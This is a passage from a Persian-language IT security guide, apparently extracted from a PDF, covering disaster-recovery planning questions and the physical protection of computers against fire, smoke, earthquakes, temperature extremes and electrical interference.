‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻗﻼﻣﻲ ﻛﻪ ﺫﻛﺮ ﺷﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺗﺄﺛﻴﺮ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺭﻭﻱ ﻋﻤﻠﻴﺎﺕ ﺧﻮﺩ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ‪:‬‬

‫ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻳﺎ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ‬


‫ﻗﻄﻊ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻭ ﺍﺗﺼﺎﻻﺕ ﺭﻭﻱ ﻋﻤﻠﻴﺎﺕ ﻋﺎﺩﻱ ﺷﻤﺎ ﭼﻪ ﺗﺄﺛﻴﺮﻱ ﻣﻲﮔﺬﺍﺭﺩ؟‬

‫ﺗﺪﺍﻭﻡ ﻛﺎﺭ ﻓﺮﻭﺷﻨﺪﻩ‬


‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﭼﻘﺪﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ؟ ﺍﮔﺮ ﻓﺮﻭﺷﻨﺪﻩ ﺗﻐﻴﻴﺮ ﺷﻐﻞ ﺩﻫﺪ ﻳﺎ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺩﻫﺪ ﻛﻪ ﺷﻤﺎ ﻧﺨﻮﺍﻫﻴﺪ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺁﻥ ﻭﻓﻖ ﺩﻫﻴﺪ‪ ،‬ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻢ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺩﻳﮕﺮﻱ ﻣﻨﺘﻘﻞ ﺷﻮﻳﺪ؟‬

‫‪54‬‬ ‫‪Disaster Recovery Plan‬‬


‫‪٢٨١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻏﻴﺒﺖ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ‬


‫ﺁﻳﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﻭﻱ ﺗﻮﺍﻧﺎﻳﻲ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺷﻤﺎ ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﺩ؟‬

‫ﻓﻮﺕ‪ ،‬ﻣﻌﻠﻮﻟﻴﺖ‪ ،‬ﻳﺎ ﻋﺰﻝ ﻳﻚ ﻋﻀﻮ ﻛﻠﻴﺪﻱ ﺳﺎﺯﻣﺎﻥ‬


‫ﺁﻳﺎ ﻫﺮ ﻋﻀﻮ ﺳﺎﺯﻣﺎﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺎﻳﮕﺰﻳﻦ ﺷﻮﺩ؟ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﭼﻴﺴﺘﻨﺪ؟‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻳﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ﺑﺎﻳﺪ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻗﺘﻀﺎﺋﻲ ﺷـﻤﺎ ﺩﺭ ﮔـﺴﺘﺮﺓ ﺳـﺎﺯﻣﺎﻧﻲ ﺑﺎﺷـﻨﺪ‪ .‬ﺣﻔـﻆ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻻ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪ ،‬ﻭﻟﻲ ﻭﻗﺘﻲ ﻓﻀﺎ‪ ،‬ﻗﺪﺭﺕ‪ ،‬ﻳﺎ ﺍﺑﺰﺍﺭ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺪﺍﻭﻡ ﻋﻤﻠﻜﺮﺩ ﻧﺒﺎﺷﺪ ﻛﻤﺘﺮ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﻣﻌﻤﻮ ﹰ‬

‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺭﺍﻳﺎﻧﻪ‬


‫ﺣﻔﺎﻇﺖ ﻓﻴﺰﻳﻜﻲ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻫﻤﺎﻥ ﻣﺴﺎﺋﻠﻲ ﺭﺍ ﺩﺭ ﺑﺮﺩﺍﺭﺩ ﻛﻪ ﻫﻨﮕﺎﻡ ﺣﻔﺎﻇﺖ ﻣﺎﺷـﻴﻦ ﺗﺤﺮﻳـﺮ‪ ،‬ﺯﻳـﻮﺭﺁﻻﺕ ﻳـﺎ ﻛـﺸﻮﻫﺎﻱ ﭘـﺮ ﺍﺯ‬
‫ﭘﺮﻭﻧﺪﻩ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﻳﻢ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻣﺎﺷﻴﻦ ﺗﺤﺮﻳﺮ ﺻﺪﻕ ﻣﻲﻛﻨﺪ‪ ،‬ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻓﺘﺮﻱ ﻭﺳﻴﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺍﻓﺮﺍﺩ ﺩﻓﺘﺮ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺯﻳﻮﺭﺁﻻﺕ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﺍﺭﺯﺵ ﻫﺴﺘﻨﺪ ﻭ ﺑﻄﻮﺭ ﻛﻠﻲ ﻓﺮﻭﺵ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻳﻚ ﺳﺎﺭﻕ ﺁﺳـﺎﻥ‬
‫ﺍﺳﺖ‪ .‬ﻣﺎﻧﻨﺪ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺪﺍﺭﻙ ﻣﺎﻟﻲ‪ ،‬ﺍﮔﺮ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻳﺎ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻫﻤﺮﺍﻩ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘـﻪ ﻳـﺎ‬
‫ﺧﺮﺍﺏ ﺷﺪﻩ ﺑﺎﺷﺪ ‪ -‬ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩﺍﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﺍﮔﺮ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻫـﻢ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ‬
‫ﻫﻤﭽﻨﺎﻥ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺍﻱ ﺑﺮﭘﺎﻳﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺟﺎﻳﮕﺰﻳﻦ ﺯﻣﺎﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺭﺍ ﺻﺮﻑ ﻛﻨﻴﺪ‪ .‬ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﻫﻤﻴﺸﻪ ﺍﻳﻦ ﺍﺣﺘﻤـﺎﻝ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ‪ ،‬ﻳﺎ ﺗﻨﻬﺎ ﺁﮔﺎﻫﻲ ﺍﺯ ﻫﻤﻴﻦ ﻧﻜﺘﻪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ‪ ،‬ﻋﻠﻴﻪ ﺧﻮﺩ ﺷﻤﺎ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﭼﻴﺰﻱ ﻛﻪ ﻣﺸﻜﻼﺕ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﻴﺎﺭ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻣﺤـﻴﻂ ﺧـﻮﺩ ﻫـﺴﺘﻨﺪ‪ .‬ﻳـﻚ ﻣﻨﺒـﻊ‬
‫ﺗﻐﺬﻳﺔ ﻗﺪﺭﺕ ﺭﺍﻳﺎﻧﻪ ﺍﮔﺮ ﺑﻪ ﺑﺮﻕ ﻭﺻﻞ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻧﺰﺩﻳﻜﻲ ﻣﺤﻞ ﺻﺎﻋﻘﻪﺍﻱ ﺭﺥ ﺩﻫﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﺣﺘﻲ ﺑﺴﻮﺯﺩ‪.‬‬
‫ﺗﺪﺍﺑﻴﺮ ﻣﺨﺘﻠﻔﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﺗﺨﺎﺫ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﻄﺮﺍﺕ ﻓﻴﺰﻳﻜﻲ ﺣﻔﺎﻇﺖ ﻛـﺮﺩ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ‬
‫ﺭﺍﻩﺣﻠﻬﺎ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺍﺯ ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ‪ ،‬ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ‪ ،‬ﻭ ﺍﺧﻼﻝﮔﺮﺍﻥ ﺩﺭﻭﻧﻲ ﻣﺤﻔﺎﻇﺖ ﻣﻲﻛﻨﻨﺪ‪.‬‬

‫ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺤﻴﻄﻲ‬


‫ﻼ ﻣﺘﻌﺎﺩﻟﻲ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻪ ﻫﻢ ﺧﻮﺭﺩﻥ ﺍﻳﻦ ﺗﻌﺎﺩﻝ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬‫ﻻ ﺑﺮﺍﻱ ﺻﺤﻴﺢ ﻛﺎﺭ ﻛﺮﺩﻥ ﺑﻪ ﺷﺮﺍﻳﻂ ﻓﻴﺰﻳﻜﻲ ﻭ ﻣﺤﻴﻂ ﻛﺎﻣ ﹰ‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﻧﺎﺧﻮﺷﺎﻳﻨﺪ ﺩﭼﺎﺭ ﺧﺮﺍﺑﻲ ﺷﻮﺩ‪ .‬ﺣﺘﻲ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻛﺎﺭ ﻧﺎﻣﻨﻈﻢ‬
‫ﺑﺎﻋﺚ ﺁﻥ ﺷﻮﺩ ﻛﻪ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺗﻲ ﻏﻴﺮﻣﻨﺘﻈﺮﻩ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﺩﻫﺪ‪ ،‬ﻧﺘﺎﻳﺞ ﻏﻠﻂ ﺗﻮﻟﻴﺪ ﻛﻨﺪ‪ ،‬ﻭ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﺭﺍ ﻣﺨﺪﻭﺵ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺁﺗﺶ‬
‫ﻻ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﺗﺶ ﺑﺴﻴﺎﺭ ﻛﻢ ﺩﻭﺍﻡ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺯ ﺍﻳﻦ ﻗﺎﻋـﺪﻩ ﻣـﺴﺘﺜﻨﻲ ﺑﺎﺷـﺪ ﺍﺯ ﻭﺟـﻮﺩ ﺗﺠﻬﻴـﺰﺍﺕ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺁﺗﺶﻧﺸﺎﻧﻲ ﺧﻮﺏ ﺩﺭ ﻧﺰﺩﻳﻜﻲ ﻣﺤﻞ ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﻣﻮﺯﺵ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺏ ﺍﺯ ﺁﻧﻬﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺨﻠﻴـﺔ‬
‫ﺍﺗﻮﻣﺎﺗﻴﻚ ﮔﺎﺯ ﻭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺁﺑﭙﺎﺵ ﻗﻄﺮﻩﺍﻱ ﻫﺮ ﻛﺪﺍﻡ ﻣﺰﺍﻳﺎ ﻭ ﻣﻌﺎﻳﺒﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺩﻗﺖ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ‪.‬‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻋﻼﻭﻩ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﺳﻴﻢﻛﺸﻲﻫﺎ ﻫﻢ ﻣﺤﻔﺎﻇﺖ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺁﺷـﻜﺎﺭﮔﺮﻫﺎﻱ ﺩﻭﺩ ﻭ ﻛﻼﻫﻜﻬـﺎﻱ‬
‫ﺁﺑﭙﺎﺷﻬﺎﻱ ﻗﻄﺮﻩﺍﻱ ‪ -‬ﺍﮔﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩﺍﻧﺪ ‪ -‬ﻃﻮﺭﻱ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﺳﻴﻤﻬﺎﻱ ﺩﺭﻭﻥ ﺳﻴﻨﻲﻫﺎﻱ ﻛﺎﺑﻞ )ﻏﺎﻟﺒﹰﺎ ﺩﺭ ﺑﺎﻻﻱ ﺳﻘﻔﻬﺎﻱ ﻛﺎﺫﺏ( ﻭ‬
‫ﻧﻴﺰ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻛﺎﺑﻞ ﺭﺍ ﭘﻮﺷﺶ ﺩﻫﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٨٢‬‬

‫ﺩﻭﺩ‬
‫ﺩﻭﺩ ﺑﺮﺍﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﻴﺎﺭ ﻣﺨﺮﺏ ﺍﺳﺖ‪ .‬ﺩﻭﺩ ﺳﺎﻳﻨﺪﻩﺍﻱ ﻗﻮﻱ ﺍﺳﺖ ﻭ ﺭﻭﻱ ﺷﺎﺧﻜﻬﺎﻱ ﺩﻳﺴﻚ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﺳـﺮﺑﺎﺯ‪ ،‬ﺩﻳـﺴﻜﻬﺎﻱ‬
‫ﻧﻮﺭﻱ ﻭ ﻧﻮﺍﺭ ﮔﺮﺩﺍﻧﻬﺎ ﺟﻤﻊ ﻣﻲﺷﻮﺩ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﻭﺩ ﺑﻮﺳﻴﻠﺔ ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﺩ‪ .‬ﺁﺗﺶﺳﻮﺯﻱﻫﺎﻱ ﺑﺮﻗﻲ ‪ -‬ﺑﻮﻳﮋﻩ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ‬
‫ﻣﺒﺪﻟﻬﺎﻱ ﻣﺎﻧﻴﺘﻮﺭﻫﺎﻱ ﻭﻳﺪﺋﻮﻳﻲ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﻭﺩﻫﺎﻱ ﺗﻨﺪ ﻭ ﺯﻧﻨﺪﻩ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻳﺮ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍ ﺧﺮﺍﺏ ﻛﻨﺪ ﻭ‬
‫ﻧﻴﺰ ﺳﻤﻲ ﻳﺎ ﺳﺮﻃﺎﻧﺰﺍ ﺑﺎﺷﺪ‪ .‬ﺧﻄﺮ ﻣﻬﻢ ﺩﻳﮕﺮ ﺩﻭﺩﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺳﻴﮕﺎﺭﻫﺎ ﻭ ﭘﻴﭗﻫﺎ ﺑﺮ ﻣﻲﺧﻴﺰﺩ‪.‬‬
‫ﺩﺭ ﻫﺮ ﺍﺗﺎﻗﻲ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺁﺷﻜﺎﺭﮔﺮ ﺩﻭﺩ‪ ٥٥‬ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﻳﻦ ﺁﺷﻜﺎﺭﮔﺮﻫﺎ ﺩﺭ ﺯﻳﺮ ﻛﻒﻫﺎﻱ ﭘﻠـﻪﺍﻱ‬
‫ﻭ ﺑﺎﻻﻱ ﺳﻘﻒ ﻛﺎﺫﺏ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺑﻪ ﻛﺴﻲ ﺍﺟﺎﺯﻩ ﺍﺳﺘﻌﻤﺎﻝ ﺩﺧﺎﻧﻴﺎﺕ ﻧﺪﻫﻴﺪ‪.‬‬

‫ﺯﻣﻴﻦﻟﺮﺯﻩ‬
‫ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﺯﻣﻴﻦ‪ ،‬ﻟﺮﺯﺷﻬﺎﻱ ﻣﻮﺳﻤﻲ ﺭﺍ ﺗﺠﺮﺑﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﺩﺭ ﺯﻣﻴﻦﻟﺮﺯﻩ ﻓﺮﻭ ﻣـﻲﺭﻳﺰﻧـﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﺳﺮﭘﺎ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ‪ .‬ﺗﻮﺟﻪ ﺩﻗﻴﻖ ﺑﻪ ﻧﺤﻮﺓ ﺍﺳﺘﻘﺮﺍﺭ ﻃﺎﻗﭽﻪﻫﺎ ﻭ ﻗﻔﺴﻪﻫﺎﻱ ﻛﺘﺎﺏ ﺩﺭ ﺩﻓﺘﺮﺗﺎﻥ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﺣﺘﻤـﺎﻝ ﺍﻳﻨﻜـﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺷـﻤﺎ ﺍﺯ‬
‫ﺷﺪﻳﺪﺗﺮﻳﻦ ﺳﻮﺍﻧﺢ ﺟﺎﻥ ﺳﺎﻟﻢ ﺑﺪﺭ ﺑﺮﻳﺪ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﺪ‪.‬‬
‫ﺍﺯ ﮔﺬﺍﺷﺘﻦ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﺭﺗﻔﺎﻋﺎﺕ ﺯﻳﺎﺩ ﻳﺎ ﻧﺰﺩﻳﻚ ﭘﻨﺠﺮﻩ ﻭ ﻫﻤﻴﻨﻄﻮﺭ ﺍﺯ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺍﺷﻴﺎﻱ ﺳﻨﮕﻴﻦ ﺭﻭﻱ ﻗﻔﺴﻪﻫﺎﻱ ﻧﺰﺩﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺑﭙﺮﻫﻴﺰﻳـﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺯﻳﺮ ﻣﻴﺰﻫﺎﻱ ﻗﻮﻱ ﻗﺮﺍﺭﺩﺍﺩ ﻳﺎ ﺑﻪ ﺳﻄﺤﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻣﺘﺼﻞ ﻛﺮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﭘـﻴﭻ ﻭ ﻣﻬـﺮﻩ‪،‬‬
‫ﻧﻮﺍﺭﻫﺎﻱ ﻧﮕﻬﺪﺍﺭﻧﺪﻩ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪) .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪(.‬‬

‫ﻛﻤﺘﺮﻳﻦ ﻭ ﺑﻴﺸﺘﺮﻳﻦ ﺩﻣﺎ‬


‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺎﻧﻨﺪ ﺍﻓﺮﺍﺩ ﺩﺭ ﺩﺍﻣﻨﺔ ﺧﺎﺻﻲ ﺍﺯ ﺩﻣﺎ ﺧﻮﺏ ﻛﺎﺭ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺍﻏﻠـﺐ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﺎﻳـﺪ ﺩﺭ ﺩﻣـﺎﻳﻲ ﺑـﻴﻦ ‪ ۱۰‬ﺗـﺎ ‪ ۳۲‬ﺩﺭﺟـﺔ‬
‫ﺳﻠﺴﻴﻮﺱ )‪ ۵۰‬ﺗﺎ ‪ ۹۰‬ﺩﺭﺟﻪ ﻓﺎﺭﻧﻬﺎﻳﺖ( ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﺩﻣﺎﻱ ﻣﺤﻴﻂ ﺍﻃﺮﺍﻑ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺧﻴﻠﻲ ﺑﺎﻻ ﺭﻭﺩ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ‬
‫ﺧﻮﺩ ﺭﺍ ﺧﻨﻚ ﻛﻨﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺟﺰﺍﻱ ﺩﺍﺧﻞ ﺁﻥ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ‪ .‬ﺍﮔﺮ ﺩﻣﺎ ﺧﻴﻠﻲ ﭘﺎﻳﻴﻦ ﺑﻴﺎﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻮﻙ ﺣﺮﺍﺭﺗـﻲ ﻭﺍﺭﺩ‬
‫ﺷﻮﺩ ﻭ ﻭﻗﺘﻲ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺭﻭﺷﻦ ﻣﻲﺷﻮﺩ ﺑﺮﺩﻫﺎﻱ ﻣﺪﺍﺭ ﻳﺎ ﻣﺪﺍﺭﻫﺎﻱ ﻣﺠﺘﻤﻊ ﺁﻥ ﺷﻜﺎﻑ ﺑﺮﺩﺍﺭﻧﺪ‪.‬‬
‫ﻭﻗﺘﻲ ﻣﺸﺨﺺ ﻛﺮﺩﻳﺪ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﭼﻪ ﻣﺤﺪﻭﺩﺓ ﺩﻣﺎﻳﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻧﻮﺳﺎﻥ ﺑﺎﺷﻨﺪ‪ ،‬ﺁﻥ ﺩﻣﺎﻫﺎ ﺭﺍ ﺑﺮﺁﻭﺭﻳﺪ‪ .‬ﺑـﻪ ﺣـﺮﺍﺭﺕﮔﻴﺮﻫـﺎ ﻭ ﺍﻟﮕـﻮﻱ‬
‫ﺟﺮﻳﺎﻥ ﻫﻮﺍﻱ ﺩﺳﺘﮕﺎﻩﻫﺎﻳﺘﺎﻥ ﺗﻮﺟﻪ ﻭﻳﮋﻩ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﺁﮊﻳﺮﻫﺎﻱ ﺩﻣﺎ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺩﻣﺎﻱ ﻣﺤﻴﻂ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫ﭘﺎﺭﺍﺯﻳﺖﻫﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ‬
‫ﻣﻮﺗﻮﺭﻫﺎ‪ ،‬ﭘﻨﻜﻪﻫﺎ‪ ،‬ﺗﺠﻬﻴﺰﺍﺕ ﺳﻨﮕﻴﻦ‪ ،‬ﻭ ﺣﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ‪ ،‬ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧـﺪ ﻣﻮﺟـﺐ ﺑـﺮﻭﺯ ﻣـﺴﺎﻳﻞ‬
